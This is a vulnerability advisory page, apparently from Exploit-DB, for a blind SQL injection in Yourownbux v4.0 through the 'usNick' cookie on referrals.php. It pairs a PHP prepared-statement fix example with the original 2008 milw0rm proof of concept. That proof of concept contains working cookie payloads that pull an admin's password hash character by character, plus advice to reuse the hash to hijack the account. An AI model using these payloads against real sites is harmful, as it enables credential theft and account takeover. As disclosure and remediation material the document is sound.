Vendor: Yourownbux
By: Tec-n0x
CVSS: 7.5 (HIGH)
Vulnerability: Blind SQL Injection
CWE: 89
Product Name: Yourownbux
Affected Version From: v4.0
Affected Version To: v4.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Yourownbux v4.0 Blind SQL Injection Vulnerability ( referrals.php )

Yourownbux v4.0 is vulnerable to blind SQL injection. An attacker can inject malicious SQL queries via the 'usNick' cookie parameter on the 'referrals.php' page and use this to extract sensitive information from the database, such as user passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
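
The mitigation above applied to the `usNick` cookie, as an added example (not Yourownbux's own code): allowlist validation of the cookie plus a bound query parameter, so the value never becomes part of the SQL text. The `username` column, the nick format, the function names and the in-memory SQLite database (needs the `pdo_sqlite` extension) are assumptions; only `usNick`, `yob_users` and the test string come from the page.

```php
<?php
declare(strict_types=1);

// Allowlist check for the cookie value.
// Assumed nick format (not from the page): 3-32 characters of [A-Za-z0-9_].
function validNick(mixed $raw): ?string
{
    if (!is_string($raw) || preg_match('/\A[A-Za-z0-9_]{3,32}\z/', $raw) !== 1) {
        return null;
    }
    return $raw;
}

// Look up a user with a prepared statement. The nick is sent as a bound
// parameter, so quotes and comment markers in it are compared as data.
// The `username` column is hypothetical; the page only names `id` and `password`.
function findUserId(PDO $db, string $nick): ?int
{
    $stmt = $db->prepare('SELECT id FROM yob_users WHERE username = :nick');
    $stmt->execute([':nick' => $nick]);
    $id = $stmt->fetchColumn();
    return $id === false ? null : (int) $id;
}

// Constructed test data in an in-memory database so the example runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE yob_users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
$db->exec("INSERT INTO yob_users (username, password) VALUES ('alice', 'constructed-hash')");

// In the application the value would come from $_COOKIE['usNick'] ?? null.
// The second sample is the cookie value quoted in the advisory's POC.
$samples = ['alice', "' AND 1=0 /*"];

foreach ($samples as $cookie) {
    // Layer 1: reject anything outside the allowlist before touching the database.
    $nick = validNick($cookie);
    $validated = $nick === null ? 'rejected' : 'accepted';

    // Layer 2: even with validation skipped, the bound parameter is only
    // compared against stored nicks and cannot alter the query.
    $bound = findUserId($db, $cookie);

    printf("%-14s validation=%s bound_lookup=%s\n",
        $cookie, $validated, var_export($bound, true));
}
```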

Exploit-DB raw data:

________                                            ._.
\______ \_______  ____ ______  ______ ____   ____   | |
 |    |  \_  __ \/  _ \\____ \/  ___// __ \_/ ___\  | |
 |    `   \  | \(  <_> )  |_> >___ \\  ___/\  \___   \|
/_______  /__|   \____/|   __/____  >\___  >\___  >  __
        \/             |__|       \/     \/     \/   \/
.____          ___.           
|    |   _____ \_ |__   ______
|    |   \__  \ | __ \ /  ___/
|    |___ / __ \| \_\ \\___ \ 
|_______ (____  /___  /____  >
        \/    \/    \/     \/ 

---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]

-----[]===========[]=> Yourownbux v4.0 Blind SQL Injection Vulnerability ( referrals.php )

-----[]===========[]=> Discovered By: Tec-n0x 
		 	Contact: Tec-n0x <at> hotmail <dot> com

-----[]===========[]=> DropSec.com =~ Lab's ..!!

-----[]===========[]=> Gr33tz:
			Celciuz, MurdeR, OzX, N.O.X, JosS, DDoS && All Friends
			
			Special Gr33tz to: C1c4tr1Z ( http://lowsec.org )

---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]

		POC: 

	Go to => http://site.com/referrals.php 	( Logged in )
	javascript:document.cookie="usNick=' AND 1=0 /*; expires=Thu, 2 Aug 2020 20:45:20 UTC; path=/";

		=> Modify : ' AND 1=0 /* With Injection's.
				
		=> Example: ' AND ascii(substring((SELECT password FROM yob_users where id=1),1,1))=100 /*
		
		=> When You got the Hash ... Add the cookie usNick with the user [ Extract it with blind if you don't know ] 
		 and the SHA1 Hash ( Exploit is going to be available Next Week on DropSec.com ).

---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]
				

# milw0rm.com [2008-10-07]